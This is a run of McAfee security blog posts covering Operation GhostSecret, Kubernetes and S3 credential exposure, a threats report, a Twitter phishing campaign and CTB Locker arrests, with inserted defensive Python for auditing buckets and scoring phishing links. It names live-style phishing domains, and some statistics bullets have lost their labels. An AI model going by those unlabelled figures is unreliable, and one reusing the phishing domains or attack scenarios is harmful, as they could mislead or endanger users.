  • ENS 10.6, Public Beta available March 9, 2018. Release is targeted around June 1, 2018

WSS 16.0.12 will include the same protection. Release of WSS is targeted for the end of May, or the beginning of June, 2018.

What Is Protected 

Windows 7 & 8 -> McAfee protection is effective

Win 10 RS3 -> McAfee protection is effective

Win 10 RS4 -> Microsoft has implemented the same protection as McAfee

EnSilo have documented that attempts to exploit Win 10 pre-RS3 result in a Windows crash, “Blue Screen of Death” (BSOD). McAfee’s testing confirms EnSilo’s results.

Users may not see a detection alert with some versions of McAfee products under some versions of Windows. McAfee testing indicates that all versions of product under every Windows version listed above are protected.


1McAfee thanks McAfee Software Engineer Alnoor Allidina for the diligence and insight that led to the Process Doppelgänging protection.

The post McAfee Protects Against Doppelgänging Technique appeared first on McAfee Blogs.

Global Malware Campaign Pilfers Data from Critical Infrastructure, Entertainment, Finance, Health Care, and Other Industries
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/global-malware-campaign-pilfers-data-from-critical-infrastructure-entertainment-finance-health-care-and-other-industries/
Wed, 25 Apr 2018 04:01:24 +0000

McAfee Advanced Threat Research analysts have uncovered a global data reconnaissance campaign assaulting a wide number of industries including critical infrastructure, entertainment, finance, health care, and telecommunications. This campaign, dubbed Operation GhostSecret, leverages multiple implants, tools, and malware variants associated with the state-sponsored cyber group Hidden Cobra. The infrastructure currently remains active. (For an extensive analysis by the Advanced Threat Research team, see “Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide.”)

The campaign is extremely complicated, leveraging a number of implants to steal information from infected systems and is intricately designed to evade detection and deceive forensic investigators. The implants vary considerably and although they share some functionality and code, they are categorized as different families. As McAfee Advanced Threat Research analysts investigated this campaign, we recognized many similarities to indicators used in the 2014 Sony Pictures attack.

A portion of this campaign aimed at the Turkish financial sector using the Bankshot implant was recently discovered by McAfee Advanced Threat Research analysts. This appears to have been the initial stage of Operation GhostSecret, as within days of publication, new attacks appeared beyond the financial sector. Between March 14 and 18, we observed the data reconnaissance implant in organizations across 17 countries.

Delving further into this campaign reveals a narrow list of organizations across the globe; the threat actors have been explicit about who can connect from which IP address. Reviewing the WHOIS information for these IP addresses shows us that there is some correlation in geography, although there are no additional clues why these addresses were used.

As we monitor this campaign, it is clear that the publicity associated with the (we assume) first phase of this campaign did nothing to slow the attacks. The threat actors not only continued but also increased the scope of the attack, both in types of targets and in the tools they used. We try to avoid using the word sophisticated because it is both subjective and overused. Nonetheless, the attackers have significant capabilities, demonstrated by their tools development and the pace at which they operate.

Fighting cybercrime is a global effort best undertaken through effective partnerships between the public and private sectors. McAfee is working with Thai government authorities to take down the control server infrastructure of Operation GhostSecret, while preserving the systems involved for further analysis by law enforcement authorities. By creating and maintaining partnerships with worldwide law enforcement, McAfee demonstrates that we are stronger together.

The post Global Malware Campaign Pilfers Data from Critical Infrastructure, Entertainment, Finance, Health Care, and Other Industries appeared first on McAfee Blogs.

Cloud Clustering Vulnerable to Attacks
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/cloud-clustering-vulnerable-to-attacks/
Mon, 16 Apr 2018 16:00:43 +0000

The authors thank John Fokker and Marcelo CaroVargas for their contributions and insights.

In our upcoming talk at the Cloud Security Alliance Summit at the RSA Conference, we will focus our attention on the insecurity of cloud deployments. We are interested in whether attackers can use compromised cloud infrastructure as viable backup resources as well as for cryptocurrency mining and other illegitimate uses. The use of containers has increased rapidly, especially when it comes to managing the deployment of applications. Our latest market survey found that 83% of organizations worldwide are actively testing or using containers in production. Applications need authentication for load balancing, managing the network between containers, auto-scaling, etc. One solution (called a cluster manager) for the automated installation and orchestration of containers is Kubernetes.

Some key components in the Kubernetes architecture appear below:

High-level Kubernetes architecture.

  • Kubernetes master server: The managing machine oversees one or more nodes
  • Node: A client that runs tasks as delegated by the user and Kubernetes master server
  • Pod: An application (or part of an application) that runs on a node. The smallest unit that can be scheduled to be deployed. Not intended to live long.

For our article, we need to highlight the etcd storage on the master server. This database stores the configuration data of the cluster and represents the overall state of the cluster at a given time. Kubernetes saves these secrets in Base64 strings; before Version 2.1 there was no authentication in etcd.

With that knowledge, security researcher Giovanni Collazo from Puerto Rico started to query the Shodan database for etcd databases connected to the Internet. He discovered many and by executing a query, some of these databases started to reveal a lot of credentials. Beyond leaking credentials from databases and other accounts, what other scenarios are possible?

Leaking Credentials

There are several ways that we can acquire credentials for cloud services without hacking into panels or services. By “creatively” searching public sites and repositories, we can find plenty of them. For example, when we searched on GitHub, we found more than 380,000 results for certain credentials. Let’s assume that half of them are useful: We would have 190,000 potentially valid credentials. As Collazo did for etcd, one can also use the Shodan search engine to query for other databases. By creating the right query for Django databases, for example, we were able to identify more cloud credentials. Amazon’s security team proactively scans GitHub for AWS credentials and informs their customers if they find credentials.

Regarding Kubernetes: Leaked credentials, complete configurations of the DNS, load balancers, and service accounts offer several possible scenarios. These include exfiltrating data, rerouting traffic, or even creating malicious containers in different nodes (if the service accounts have enough privileges to execute changes in the master server).

Creating malicious containers.

One of the biggest risks concerning leaked credentials is the abuse of your cloud resources for cryptomining. The adversaries can order multiple servers under your account to start cryptomining, enriching their bank accounts while you pay for the computing power “you” ordered.

Open Buckets

We have heard a lot about incidents in which companies have not secured their Amazon S3 buckets. A number of tools can scan for “open” buckets and download the content. Attackers would be most interested in write-enabled rights on a bucket. For our Cloud Security Alliance keynote address at RSA, we created a list of Fortune 1000 companies and looked for readable buckets. We discovered quite a few. That is no surprise, but if you combine the read-only buckets information with the ease of harvesting credentials, the story changes. With open and writable buckets, the adversaries have plenty of opportunities: storing and injecting malware, exfiltrating and manipulating data, etc.

McAfee cloud researchers offer an audit tool that, among other things, verifies the rights of buckets. As we write this post, more than 1,200 writable buckets belonging to a multitude of companies are accessible to the public. One of the largest ad networks in the world had a publicly writable bucket. If adversaries could access that network, they could easily inject malicious code into advertisements. (As part of our responsible disclosure process, we reported the issue, which was fixed within hours.) You can read an extensive post on McAfee cloud research and how the analysts exposed possible man-in-the-middle attacks leveraging writable buckets.
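One way to perform the kind of bucket-rights check described above, as an added example that is not McAfee’s audit tool: it classifies a bucket as public-write, public-read or private from its ACL and bucket policy. The function names are ours, and the two documents it inspects are constructed samples in the shape that boto3’s get_bucket_acl and get_bucket_policy return, so nothing here contacts AWS.

```python
"""Audit S3 bucket ACLs and bucket policies for public read/write access.

Added example (not McAfee's audit tool). The input documents below are
constructed samples in the shape boto3 returns from get_bucket_acl() and
get_bucket_policy(); nothing here talks to AWS.
"""
import json

# Grantee URIs that Amazon S3 uses for "everyone" and "any AWS account".
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers",
}
# ACL permissions that let the grantee add, replace or re-ACL objects.
WRITE_PERMISSIONS = {"WRITE", "WRITE_ACP", "FULL_CONTROL"}
# Policy actions (lowercased) that amount to write access on objects.
WRITE_ACTIONS = {"s3:putobject", "s3:deleteobject", "s3:putobjectacl", "s3:*", "*"}
READ_ACTIONS = {"s3:getobject", "s3:listbucket", "s3:*", "*"}


def public_acl_grants(acl):
    """Return [(group, permission)] for every ACL grant to a public group."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") != "Group":
            continue
        group = PUBLIC_GROUPS.get(grantee.get("URI"))
        if group:
            findings.append((group, grant["Permission"]))
    return findings


def _as_list(value):
    # Policy fields such as Action and Principal may be a string or a list.
    return value if isinstance(value, list) else [value]


def public_policy_actions(policy):
    """Return the lowercased actions an Allow statement grants to everyone.

    A principal is 'everyone' when it is "*" or {"AWS": "*"}. Statements
    carrying a Condition block are skipped: they may be scoped (for example
    to a VPC) and deserve manual review rather than an automatic verdict.
    """
    actions = set()
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or "Condition" in stmt:
            continue
        principal = stmt.get("Principal")
        if isinstance(principal, dict):
            principal = principal.get("AWS")
        if "*" not in _as_list(principal or []):
            continue
        actions.update(a.lower() for a in _as_list(stmt.get("Action", [])))
    return actions


def classify_bucket(acl, policy=None):
    """Classify a bucket as 'public-write', 'public-read' or 'private'."""
    acl_perms = {perm for _, perm in public_acl_grants(acl)}
    actions = public_policy_actions(policy) if policy else set()
    if acl_perms & WRITE_PERMISSIONS or actions & WRITE_ACTIONS:
        return "public-write"
    if acl_perms or actions & READ_ACTIONS:
        return "public-read"
    return "private"


# Constructed sample: an ACL that lets anyone upload (the risky case).
SAMPLE_WRITABLE_ACL = {
    "Owner": {"ID": "example-owner-id"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "example-owner-id"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group",
                     "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "WRITE"},
    ],
}

# Constructed sample: a policy that only exposes objects for download.
SAMPLE_READ_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [{"Effect": "Allow", "Principal": "*",
                 "Action": "s3:GetObject",
                 "Resource": "arn:aws:s3:::example-bucket/*"}]
}""")

# Constructed sample: only the owner appears in the ACL.
SAMPLE_PRIVATE_ACL = {"Owner": {"ID": "example-owner-id"},
                      "Grants": [SAMPLE_WRITABLE_ACL["Grants"][0]]}

if __name__ == "__main__":
    print(classify_bucket(SAMPLE_WRITABLE_ACL))                     # public-write
    print(classify_bucket(SAMPLE_PRIVATE_ACL, SAMPLE_READ_POLICY))  # public-read
    print(classify_bucket(SAMPLE_PRIVATE_ACL))                      # private
```

In a real audit the ACL and policy documents would come from boto3 calls for each bucket in the account, and any "public-write" result is the case the post warns about.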

Clustering the Techniques

To combat ransomware, many organizations use the cloud to back up and protect their data. In our talk we will approach the cloud as an attack vector for spreading ransomware. With the leaked credentials we discovered from various sources, the open and writable buckets created a groundwork for storing and spreading our ransomware. With attackers having a multitude of credentials and storage places such as buckets, databases, and containers, defenders would have difficulty keeping up. We all need to pay attention to where we store our credentials and how well we monitor and secure our cloud environments.

The post Cloud Clustering Vulnerable to Attacks appeared first on McAfee Blogs.

‘McAfee Labs Threats Report’ Examines Cryptocurrency Hijacking, Ransomware, Fileless Malware
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-examines-cryptocurrency-hijacking-ransomware-fileless-malware/
Mon, 12 Mar 2018 04:03:31 +0000

Today McAfee published the McAfee Labs Threats Report: March 2018. The report looks into the growth and trends of new malware, ransomware, and other threats in Q4 2017. McAfee Labs saw on average eight new threat samples per second, and the increasing use of fileless malware attacks leveraging Microsoft PowerShell. The Q4 spike in Bitcoin value prompted cybercriminals to focus on cryptocurrency hijacking through a variety of methods, including malicious Android apps.

Each quarter, McAfee Labs, led by the Advanced Threat Research team, assesses the state of the cyber threat landscape based on threat data gathered by the McAfee Global Threat Intelligence cloud from hundreds of millions of sensors across multiple threat vectors around the world. McAfee Advanced Threat Research complements McAfee Labs by providing in-depth investigative analysis of cyberattacks from around the globe.

Cybercriminals Take on New Strategies, Tactics

The fourth quarter of 2017 saw the rise of newly diversified cybercriminals, as a significant number of actors embraced novel criminal activities to capture new revenue streams. For instance, the spike in the value of Bitcoin prompted actors to branch out from moneymakers such as ransomware, to the practice of hijacking Bitcoin and Monero wallets. McAfee researchers discovered Android apps developed exclusively for the purpose of cryptocurrency mining and observed discussions in underground forums suggesting Litecoin as a safer model than Bitcoin, with less chance of exposure.

Cybercriminals also continued to adopt fileless malware leveraging Microsoft PowerShell, which surged 432% over the course of 2017, as the threat category became a go-to toolbox. The scripting language was used within Microsoft Office files to execute the first stage of attacks.

Health Care Targeted

Although publicly disclosed security incidents targeting health care decreased by 78% in the fourth quarter of 2017, the sector experienced a dramatic 210% overall increase in incidents in 2017. Through their investigations, McAfee Advanced Threat Research analysts conclude many incidents were caused by organizational failure to comply with security best practices or address known vulnerabilities in medical software.

McAfee Advanced Threat Research analysts looked into possible attack vectors related to health care data, finding exposed sensitive images and vulnerable software. Combining these attack vectors, analysts were able to reconstruct patient body parts, and create three-dimensional models.

Q4 2017 Threats Activity

Fileless malware. In Q4 JavaScript malware growth continued to slow with new samples decreasing by 9%, while new PowerShell malware more than tripled, growing 267%.

Security incidents. McAfee Labs counted 222 publicly disclosed security incidents in Q4, a decrease of 15% from Q3. 30% of all publicly disclosed security incidents in Q4 took place in the Americas, followed by 14% in Europe and 11% in Asia.

Vertical industry targets. Public, health care, education, and finance, respectively, led vertical sector security incidents for 2017.

  • Health Care. Disclosed incidents experienced a surge in 2017, rising 210%, while falling 78% in Q4.
  • Public sector. Disclosed incidents decreased 15% in 2017, down 37% in Q4.
  • Disclosed incidents rose 125% in 2017, remaining stagnant in Q4.
  • Disclosed incidents rose 16% in 2017, falling 29% in Q4. 

Regional targets

  • Disclosed incidents rose 46% in 2017, falling 46% in Q4.
  • Disclosed incidents fell 58% in 2017, rising 28% in Q4.
  • Disclosed incidents fell 20% in 2017, rising 18% in Q4.
  • Disclosed incidents rose 42% in 2017, falling 33% in Q4. 

Attack vectors. In Q4 and 2017 overall, malware led disclosed attack vectors, followed by account hijacking, leaks, distributed denial of service, and code injection.

Ransomware. The fourth quarter saw notable industry and law enforcement successes against criminals responsible for ransomware campaigns. New ransomware samples grew 59% over the last four quarters, and the number of new ransomware samples rose 35% in Q4. The total number of ransomware samples increased 16% in the last quarter to 14.8 million samples.

Mobile malware. New mobile malware decreased by 35% from Q3. In 2017 total mobile malware experienced a 55% increase, while new samples declined by 3%.

Malware overall. New malware samples increased in Q4 by 32%. The total number of malware samples grew 10% in the past four quarters.

Mac malware. New Mac OS malware samples increased by 24% in Q4. Total Mac OS malware grew 58% in 2017.*

Macro malware. New macro malware increased by 53% in Q4, declined by 35% in 2017.

Spam campaigns. 97% of spam botnet traffic in Q4 was driven by Necurs—recent purveyor of “lonely girl” spam, pump-and-dump stock spam, and Locky ransomware downloaders—and by Gamut—sender of job offer–themed phishing and money mule recruitment emails.

*This blog post has been edited to correct the percentage increase of Mac OS malware in 2017.

For more information on these threat trends and statistics, please visit:

Twitter @Raj_Samani & @McAfee_Labs.

The post ‘McAfee Labs Threats Report’ Examines Cryptocurrency Hijacking, Ransomware, Fileless Malware appeared first on McAfee Blogs.

MWC 2018: Digital and Mobile Security in the 5G IoT Era
https://securingtomorrow.mcafee.com/business/mwc-2018-digital-mobile-security-5g-iot-era/
Tue, 27 Feb 2018 08:01:30 +0000

Mobile World Congress 2018 is upon us and the big news includes the launch of a bunch of new devices, including the Sony Xperia XZ2 Compact, Samsung Galaxy S9, Sony Xperia XZ Premium 2 and Samsung Galaxy Tab S4.

In addition to these and dozens of other devices launching at this year’s event in Barcelona, we are seeing the acceleration of the trend for domestic and industrial smart devices, voice-controlled digital assistants and other internet of things (IoT) enabled smart devices.

Google, for example, is using MWC 2018 as a platform to publicise Google Assistant and the Google Home smart speaker, though one thing we still haven’t heard enough about are the many new security threats and issues surrounding new smart devices, digital assistants and IoT technologies.

Biometric Authentication, 5G Realities and IoT security

Another notable trend at MWC 2018 has been the focus from Samsung and some of the other major mobile players on improved forms of biometric authentication, with Samsung releasing a much-improved Iris Scanner as part of the new Galaxy S9 range.

It’s certainly a really positive move to see this focus on identity authentication at this year’s show, with a notable shift at this year’s event from the hype surrounding virtual and augmented reality and voice-controlled smart homes to far more realistic and practical concerns around security, biometrics and the real-world use cases of superfast 5G networking tech.

Much of the conversation around 5G, of course, is still dominated around how edge computing and low latency in 5G networks will actually translate into valuable and useable services for consumers and businesses alike.

These new 5G use cases dominated the IoT news at MWC 2018, with numerous exhibitors talking up their latest 5G IoT applications and concepts. And almost by default digital security has also become one of the hottest topics in Barcelona this year, as small developers and the major multinational mobile brands alike wake up to the fact that security is of paramount importance across the entire IoT supply chain.

Evolving Digital Security for the 5G IoT Era

Firms are realising that their digital security strategy has to evolve at the same pace as the many new developments in the current buzzword bingo card such as 5G IoT, artificial intelligence (AI) and machine learning.

Failure to undertake the appropriate due diligence in these new emerging technologies opens firms up to significant penalties when the inevitable data breaches occur.

In addition to the focus on improving mobile handset security and raising awareness of digital security issues in the smart home, the onus for 5G network level security really needs to shift back to the telecommunications companies themselves.

The 5G Security Challenge for Telecoms

The bottom line is this: the security of 5G networks presents a fundamental challenge to the telecommunications industry at large. Something that the hype machine surrounding 5G at MWC 2018 generally fails to highlight, for obvious reasons!

The promise of 5G-enabled services in smart cities, connected cars and across the burgeoning e-health sector, for example, is clear. Yet the fact that network-wide security and security across the IoT value chain is fundamental to these types of applications and services operating safely is still too often overlooked.

Driverless cars, smart surgery and IoT applications across the manufacturing sector are good examples to cite, where digital security is crucial.

All of which is why we as an industry have to work better together – from digital security specialists through to 5G IoT app and hardware developers through to the multinational telecommunications companies themselves – to ensure that we are doing all we can to meet the security challenges and the many increasingly sophisticated attacks that are sure to come in the 5G era.

Why is the Technology Industry Shirking its Security Responsibilities? https://securingtomorrow.mcafee.com/business/technology-industry-shirking-security-responsibilities/ https://securingtomorrow.mcafee.com/business/technology-industry-shirking-security-responsibilities/#respond Sat, 24 Feb 2018 09:00:57 +0000 https://securingtomorrow.mcafee.com/?p=84689 No sooner have we had time to recover from the post-CES jet-lag in January than Mobile World Congress 2018 rolls around. These two events have cemented themselves into the mobile and consumer technology industries’ calendars as key opportunities to showcase the latest hardware and software products and services, amidst a flurry of media hype and […]

The post Why is the Technology Industry Shirking its Security Responsibilities? appeared first on McAfee Blogs.

No sooner have we had time to recover from the post-CES jet-lag in January than Mobile World Congress 2018 rolls around. These two events have cemented themselves into the mobile and consumer technology industries’ calendars as key opportunities to showcase the latest hardware and software products and services, amidst a flurry of media hype and eager expectation from early adopters worldwide. So what’s in store for the technology industry and its eager consumers in 2018?

If anything, CES this year was a little flat, with little to see in the way of real innovation. This year’s show was a year of ‘iteration’ not ‘innovation’, particularly in the IT security industry, where the conversation at the show was dominated by promises of ‘security by design’ but no real demonstration of this. I was personally very interested to find out more about the latest smart safe that was unveiled at the show, billed as “a smarter way to keep valuables safe”.

Here was a new IoT device that, if anything, surely had to have the best digital security baked into it by design, no?

Unfortunately, that particular internet-connected safe turned out to be something of a damp squib, mainly because it proved incredibly easy to crack open. One BBC Tech reporter noted a worrying flaw: the safe failed to trigger a theft alert. We simply banged on the top of the safe and it opened. What is more remarkable is that this weakness is well known. I had an issue with a smart safe of my own when the battery ran out and, of course, I had lost my key. One quick search on YouTube revealed that banging on the top of the safe would work, and guess what: it actually did! So much for ‘digital peace of mind’…

That’s merely one example of a slightly broken product that clearly needs a little more development before it hits the market. But that single widely-publicized security snafu was, unfortunately, tellingly symptomatic of an industry-wide trend of shirking responsibility for consumers’ digital (and physical) security.

All too often, digital and mobile security is still considered an afterthought by hardware manufacturers and software developers alike, which is simply no longer viable, particularly given the increasing number and sophistication of cyber-attacks on mobile devices. For a very good example of this, see the results of McAfee’s latest Mobile Threat Report 2018, to be released at MWC 2018, which reveals an explosion in mobile malware and dramatic changes in the mobile landscape over the last year.

If smartphone manufacturers genuinely wish to charge consumers in excess of £1000 for handsets, and to provide finance plans to fund them, then, simply put, we need to know those handsets are trustworthy. Shifting the blame onto the user, rather than building adequate methods of prevention into our business models, is not acceptable.

So, on to Mobile World Congress 2018 in Barcelona, where we will be making some major announcements regarding a number of strategic partnerships with some of the world’s telecoms giants, designed to keep mobile users and the data on their increasing number of smart devices safe, both in the home and on the go.

After all, it’s not that flash £1000 phone in your pocket that the real cybercriminals are after. It’s the data stored within it, which can potentially give them complete access to your bank account, your confidential business data and more. And as the number of devices in our homes, our bags, our cars and our offices continues to proliferate, so does the number of attack vectors that cybercriminals can use to fraudulently obtain money.

The Reality of an Incoming C1 Cyberattack on the UK https://securingtomorrow.mcafee.com/business/reality-incoming-c1-cyberattack-uk/ https://securingtomorrow.mcafee.com/business/reality-incoming-c1-cyberattack-uk/#respond Mon, 29 Jan 2018 17:09:24 +0000 https://securingtomorrow.mcafee.com/?p=84048 “When, not if.” Ciaran Martin, head of the U.K.’s National Cyber Security Centre (NCSC), used those words to say he is expecting a devastating cyberattack will hit the U.K. in the next two years. The attack, he believes, will bring disruption to British elections and critical infrastructure. These remarks were made in light of newly […]

The post The Reality of an Incoming C1 Cyberattack on the UK appeared first on McAfee Blogs.

“When, not if.”

Ciaran Martin, head of the U.K.’s National Cyber Security Centre (NCSC), used those words to say he is expecting a devastating cyberattack will hit the U.K. in the next two years. The attack, he believes, will bring disruption to British elections and critical infrastructure. These remarks were made in light of newly released figures detailing the number of cyberattacks on the U.K. in the last 15 months. Martin said the U.K. has been fortunate to avoid a so-called category one (C1) attack, broadly defined as an attack that might cripple infrastructure such as energy supplies and the financial services sector.

His prediction initially brings one thing to mind: WannaCry. A strain of the ransomware impacted 50 countries and infected more than 250,000 machines in just one day. Its damage included the takedown of 16 U.K. NHS medical centers. WannaCry was rated by the NCSC as a C2 level of attack, milder than the C1 Martin says is still to come.

Organisations across the U.K. were unprepared when WannaCry hit last May, and there is no simple fix to protect everyone. Martin concedes total protection is impossible, stating “Some attacks will get through. What you need to do is cauterise the damage.” The NCSC has been gradually building defenses and is due to publish a 60-plus-page dossier outlining what has worked and what has not since it opened in October 2016. Defense is a responsibility that falls on all of our shoulders, and begins with a new mentality that attacks are inevitable, and preparedness vital for a “culture of security.”

There is a misconception that cybersecurity is an IT issue that affects systems, not ordinary people. The reality is that cybercrime hurts us all. A massive cyberattack impacts economies, governments, innovation, growth, even the global state of mind. If we all accept the reality of a potential C1 attack, we also accept the challenge to bond together in a new pact to protect the assets and values we hold dear. We must do this. It’s a matter of when, not if.

To learn more about modern day threat landscape, be sure to follow us at @McAfee and @McAfee_Labs.

Twitter Accounts of US Media Under Attack by Large Campaign https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/twitter-accounts-of-us-media-under-attack-by-large-campaign/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/twitter-accounts-of-us-media-under-attack-by-large-campaign/#respond Wed, 24 Jan 2018 00:59:27 +0000 https://securingtomorrow.mcafee.com/?p=83864 A previously reported campaign purportedly carried out by Turkish hacker group “Ayyildiz Tim” targeting high-profile, verified Twitter accounts with the purpose of spreading Turkish political propaganda appears to have escalated within the last 24 hours. McAfee Advanced Threat Research has investigated the new events and discovered the following.

The post Twitter Accounts of US Media Under Attack by Large Campaign appeared first on McAfee Blogs.

A previously reported campaign purportedly carried out by Turkish hacker group “Ayyildiz Tim” targeting high-profile, verified Twitter accounts with the purpose of spreading Turkish political propaganda appears to have escalated within the last 24 hours. McAfee Advanced Threat Research has investigated the new events and discovered the following. On January 13, the Twitter account of the Indian ambassador to the United Nations was taken over and used to spread pro-Pakistan and pro-Turkey posts:

What seemed to be a single event soon became a targeted campaign that we discovered in cooperation with our partner SocialSafeGuard. Combining their technology and our threat researchers, we started to build a timeline of events:

 

In each case in this timeline, the account was restored after several hours.

Once an account was compromised, the attackers direct-messaged its contacts, either with propaganda for their cause or with a link designed to lure them to a phishing site that harvested the recipient’s Twitter credentials.

One example of such a site is hxxp://fox-news.medianewsonline.com/.

Visiting the page shows the following:

If we look at the source code of the page, we discover several Turkish-language segments.

Focusing on the domains used for the phishing sites, we discovered more registered sites. Some examples:

  • mypressonline.com
  • official-twitter-jp.mypressonline.com
  • feedbac-verifv.mypressonline.com
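
The domains above follow one pattern: the impersonated brand (Twitter, Fox News) sits in the subdomain or path of a free-hosting domain rather than in the registered domain itself. The following Python is an added example, not tooling from McAfee or SocialSafeGuard: it scores a URL (defanged hxxp:// IOCs accepted) for that pattern and for credential-lure keywords, and runs the check over every link in a direct message. The BRANDS, LEGIT_DOMAINS and LURE_WORDS tables are assumptions chosen to fit the domains quoted in this post; the registered-domain split is a deliberately crude last-two-labels heuristic.

```python
"""Brand-impersonation scoring for phishing links sent by DM.

Added example, not McAfee or SocialSafeGuard code. Tables below are
assumptions fitted to the domains quoted in the post.
"""
import re
from urllib.parse import urlsplit

# Brands impersonated in this campaign (assumption: extend for your own watch list)
BRANDS = ("twitter", "fox-news", "foxnews")
# Registered domains that legitimately own those brands (assumption, not exhaustive)
LEGIT_DOMAINS = {"twitter.com", "foxnews.com"}
# Words that commonly appear in credential-harvesting lures (assumption)
LURE_WORDS = ("verif", "login", "feedback", "official", "secure", "support")

# Matches http(s) and defanged hxxp(s) links inside free text such as a DM
URL_RE = re.compile(r"""h(?:tt|xx)ps?://[^\s<>"']+""")


def registered_domain(host: str) -> str:
    """Crude eTLD+1: the last two labels. Production code should use the
    Public Suffix List, otherwise 'example.co.uk' comes out as 'co.uk'."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def lookalike_score(url: str) -> dict:
    """Flag a URL whose brand name lives in the subdomain or path rather than
    in the registered domain, e.g. official-twitter-jp.mypressonline.com."""
    parts = urlsplit(url.replace("hxxp", "http", 1))  # accept defanged IOCs
    host = parts.hostname or ""
    reg = registered_domain(host)
    verdict = {"host": host, "registered_domain": reg, "suspicious": False, "reasons": []}
    if reg in LEGIT_DOMAINS:
        return verdict  # the brand lives where it should
    subdomain = host[: len(host) - len(reg)].rstrip(".")
    haystack = (subdomain + "/" + parts.path).lower().replace("_", "-")
    for brand in BRANDS:
        if brand in haystack:
            verdict["reasons"].append(f"brand '{brand}' outside registered domain {reg}")
    if any(word in haystack for word in LURE_WORDS):
        verdict["reasons"].append("credential-lure keyword in subdomain or path")
    verdict["suspicious"] = bool(verdict["reasons"])
    return verdict


def flag_links(message: str) -> list:
    """Score every URL in a direct message; the campaign's lure was a DM link."""
    return [lookalike_score(u) for u in URL_RE.findall(message)]


if __name__ == "__main__":
    # Constructed DM text carrying one of the domains quoted in the post
    for hit in flag_links("Please verify your account: hxxp://feedbac-verifv.mypressonline.com/twitter"):
        print(hit)
```

A hit on `registered_domain` that is a known free-hosting or dynamic-DNS provider is worth an extra weight in practice; the post's domains all sit under such providers.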

Who is behind this campaign? According to the messages used, the Turkish hacker group “Ayyildiz Tim” (AYT) claims responsibility for the attacks. The group was founded in 2002 and advocates Turkish state ideology. In the following example, we see that the background image of Greta van Susteren’s account has been changed to one of the many wallpapers used by the group:

We advise journalists in particular, as well as others in high-profile positions, to follow appropriate safeguards to protect their accounts.

We are aware that one of the tactics from this group is to use Direct Messaging to communicate with other prominent Twitter accounts. There is also evidence that private messaging history has been accessed from certain compromised accounts of prominent figures, along with other sensitive or confidential information such as private phone numbers and emails.  If you receive a message, even from someone you know or trust, be aware that the message may not be from the person you know. It is potentially directing you to malicious content.

You absolutely should verify through an alternate channel that the link is safe to click.

McAfee Labs Advanced Threat Research Aids Arrest of Suspected Cybercrime Gang Linked to Top Malware CTB Locker https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/advanced-threat-research/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/advanced-threat-research/#respond Wed, 20 Dec 2017 12:00:38 +0000 https://securingtomorrow.mcafee.com/?p=83276 In our recent research, we interviewed the actors behind ransomware campaigns. One of the interesting findings was cybercriminals seemed to have a sense of absolute safety when conducting criminal operations. Cybercrime is an area of crime like no other, perceived as low-risk with high returns, which contributes greatly to its rapid growth.

The post McAfee Labs Advanced Threat Research Aids Arrest of Suspected Cybercrime Gang Linked to Top Malware CTB Locker appeared first on McAfee Blogs.

In our recent research, we interviewed the actors behind ransomware campaigns. One of the interesting findings was cybercriminals seemed to have a sense of absolute safety when conducting criminal operations. Cybercrime is an area of crime like no other, perceived as low-risk with high returns, which contributes greatly to its rapid growth.

Today, with the arrest of individuals suspected of infecting computer systems by spreading the CTB Locker malware, a clear message has been sent—involvement in cybercrime is not zero-risk.

CTB Locker

CTB Locker, also known as Critroni, is one of the largest ransomware families. It helped drive a 165 percent surge in new ransomware in 2015 as one of the top three families, and earned the No. 1 spot just a year later. Operation Tovar, in which law enforcement agencies took down the infrastructure responsible for spreading CryptoLocker, created a need for more malware; the CTB Locker and CryptoWall families helped to fill the gap.

In June 2014, the CTB Locker authors began to advertise the malware family on the underground scene for $3,000 USD (the first versions had been offered for $1,500 USD). The authors also offered an affiliate program, which is what made CTB Locker infamous. In return for a percentage of the ransoms received, affiliates took on the greater risk, because they had to spread the ransomware, but they also enjoyed the higher profits. Using exploit kits and spam campaigns, the malware was distributed all over the world, mostly targeting “Tier 1” countries, those in which victims could afford to pay and most likely would pay the ransom. Midway through 2015, we obtained unique information from an affiliate server that helped us tremendously in the subsequent investigations.

A CTB Locker affiliate server.
An example of CTB Locker source code.

Besides the use of an affiliate server in CTB Locker’s infrastructure, two other components complete the setup: a gateway server and a payment server.

Attacks Begin to Grow

During 2016, a massive spam campaign struck the Netherlands. Emails in Dutch appeared to originate from one of the largest telco providers and claimed to have the latest bill attached. There was no bill, of course, but rather CTB Locker, demanding around $400 USD in ransom to return the files. The grammar and word usage were near perfect, not what we commonly observe, and the names in the email were proof of a well-prepared campaign. More than 200 cases were filed in the Netherlands alone with regard to these infections.

With attacks growing in number, the Dutch High Tech Crime Unit began an investigation. The unit approached McAfee’s Advanced Threat Research team to assist in identifying samples and answering questions.

Following our research we were kept updated, and were informed that Operation Bakovia began in the early morning of December 14. The initial investigation focused on the CTB Locker ransomware, but based on information from the U.S. Secret Service it was determined that the same suspected gang was also linked to the distribution of Cerber ransomware, another major family.

The Arrests

During the operation in eastern Romania, six houses were searched, and investigators seized a significant number of hard drives, laptops, external storage devices, cryptocurrency mining rigs, and hundreds of SIM cards. Suspects were arrested for allegedly spreading CTB Locker ransomware, and other suspects allegedly responsible for spreading Cerber were arrested at the airport in Bucharest.

Watch video of arrests. 

The law enforcement action emphasizes the value of public-private partnerships and underscores the determination behind the McAfee mantra “Together is power.”

